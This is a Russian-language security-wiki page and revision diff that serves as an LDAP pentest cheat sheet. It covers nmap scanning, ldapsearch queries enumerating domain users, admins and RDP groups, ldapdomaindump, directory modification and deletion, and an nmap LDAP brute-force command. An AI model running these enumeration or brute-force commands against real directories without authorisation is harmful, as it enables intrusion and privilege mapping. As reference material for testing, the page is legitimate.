Ldap all — различия между версиями
Материал из InformationSecurity WIKI
Drakylar (обсуждение | вклад) м (→ldapsearch) |
Drakylar (обсуждение | вклад) м (→ldapsearch) |
||
Строка 46: | Строка 46: | ||
ldapsearch -x -p 1389 -h "127.0.0.1" -b "dc=company,dc=com" -s one "objectClass=*" | ldapsearch -x -p 1389 -h "127.0.0.1" -b "dc=company,dc=com" -s one "objectClass=*" | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | |||
+ | Список юзеров | ||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TDL>" | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | Компьютеры | ||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TDL>" | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | Информация о себе | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TDL>" | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | Доменные администраторы | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TDL>" | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | |||
+ | Доменные пользователи | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TDL>" | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | |||
+ | "Enterprise" администраторы | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TDL>" | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | |||
+ | Просто администраторы | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TDL>" | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | |||
+ | Группа RDP | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TDL>" | ||
</syntaxhighlight> | </syntaxhighlight> | ||
Версия 13:42, 28 апреля 2020
Содержание
Работа с LDAP
Поиск
Скан портов
Nmap
1 nmap -p 389,636,3268,3269 -sV target -v
Получение информации
Структура LDAP
Nmap
Получаем всю публичную инфу в тч про CN и DC.
1 nmap -p 389,636 --script ldap-rootdse target -vv
Чтение LDAP
Используем когда знаем структуру
ldapsearch
Простой вариант
1 ldapsearch -x -b "dc=company,dc=com" -s base -h <host>
2
3 ldapsearch -x -h target -D '' -w '' -b "dc=company,dc=com"
С ssl
1 LDAPTLS_REQCERT=never ldapsearch -x -D "uid=Name.Surname,OU=People,DC=Company,DC=com" -W -H ldaps://<host> -b "uid=Name.Surname,OU=People,DC=Company,DC=com" -s sub
Поиск
1 ldapsearch -x -p 389 -h "127.0.0.1" -b "ou=people,dc=company,dc=com" -s sub "objectClass=*"
2
3 ldapsearch -x -p 1389 -h "127.0.0.1" -b "dc=company,dc=com" -s one "objectClass=*"
Список юзеров
1 ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TDL>"
Компьютеры
1 ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TDL>"
Информация о себе
1 ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TDL>"
Доменные администраторы
1 ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TDL>"
Доменные пользователи
1 ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TDL>"
"Enterprise" администраторы
1 ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TDL>"
Просто администраторы
1 ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TDL>"
Группа RDP
1 ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TDL>"
ldapdomaindump
1 usage: ldapdomaindump [-h] [-u USERNAME] [-p PASSWORD] [-at {NTLM,SIMPLE}]
2 [-o DIRECTORY] [--no-html] [--no-json] [--no-grep]
3 [--grouped-json] [-d DELIMITER] [-r] [-n DNS_SERVER]
4 [-m]
5 HOSTNAME
Редактирование LDAP
ldapmodify
1 ldapmodify -a -h "127.0.0.1" -p 389 -D "cn=Directory Manager" -w 'password' -f modify.ldif
2 dn: ou=people,dc=company,dc=com
3 objectClass: top
4 objectClass: organizationalunit
5 ou: people
6 ...
ldapdelete
1 ldap delete -x -D "cn=Directory Manager" -w 'password' -p 1389 -h "127.0.0.1" "uid=identifier,ou=people,dc=company,dc=com"
Атаки
Брут
Nmap
1 nmap -p 389,636 --script ldap-brute --script-args ldap.base='"cn=schema,dc=targetbox,dc=target"' target -vv